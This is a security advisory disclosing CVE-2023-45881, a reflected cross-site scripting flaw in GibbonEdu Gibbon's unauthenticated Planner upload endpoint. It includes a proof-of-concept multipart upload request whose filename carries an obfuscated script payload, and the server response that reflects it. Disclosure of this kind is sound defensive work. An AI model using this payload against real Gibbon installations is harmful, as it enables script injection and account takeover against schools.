Headline
CVE-2023-45881: usd-2023-0024 - usd HeroLab
GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response.
usd-2023-0024 | Cross-Site Scripting
Advisory ID: usd-2023-0024
Product: Gibbon
Affected Version: 25.0.00
Vulnerability Type: CWE-79
Security Risk: High
Vendor URL: https://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE number: CVE-2023-45881
Desciption
Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.
A reflected XSS was found in the filename of uploaded files.
This can lead to the creation of arbitrary high privileged accounts.
Proof of Concept
The application allows to upload files without prior authentication using the
/modules/Planner/resources_addQuick_ajaxProcess.php
endpoint.
The following request can be used to upload files to the server:
POST /modules/Planner/resources_addQuick_ajaxProcess.php HTTP/1.1 Host: localhost:8080 […]
------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="id"
body ------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="bodyaddress"
------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="bodyfile1"; filename="…/<img src=X onerror=eval(atob(‘YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==’))>.gif" Content-Type: text/plain
<!DOCTYPE html> <html><h1>hello</h1>/html>
------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="bodyfile2"
------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="bodyfile3"
------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="bodyfile4"
------WebKitFormBoundaryeSZWbY4RNteSpbi4 Content-Disposition: form-data; name="imagesAsLinks"
Y ------WebKitFormBoundaryeSZWbY4RNteSpbi4–
The imagesAsLinks parameter must be set to Y to return HTML code.
The filename attribute of the bodyfile1 parameter is reflected in the response.
The response of the request will look like:
HTTP/1.1 200 OK Server: Apache Set-Cookie: G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=/; HttpOnly; SameSite=Lax […]
<a target=’_blank’ style=’font-weight: bold’ href=’http://localhost:8080/uploads/2023/07/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ_Go0qk7tKRgW0S9X8.gif’><img src=X onerror=eval(atob(‘YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==’))>
Fix
It is recommended to treat all input on the website as potentially dangerous.
References
- https://cwe.mitre.org/data/definitions/79.html
Timeline
- 2023-07-11: Vulnerability identified by Christian Poeschl
- 2023-09-19: Security Release v25.0.01
- 2023-11-02: Advisory published
Credits
This security vulnerability was identified by Christian Poeschl of usd AG.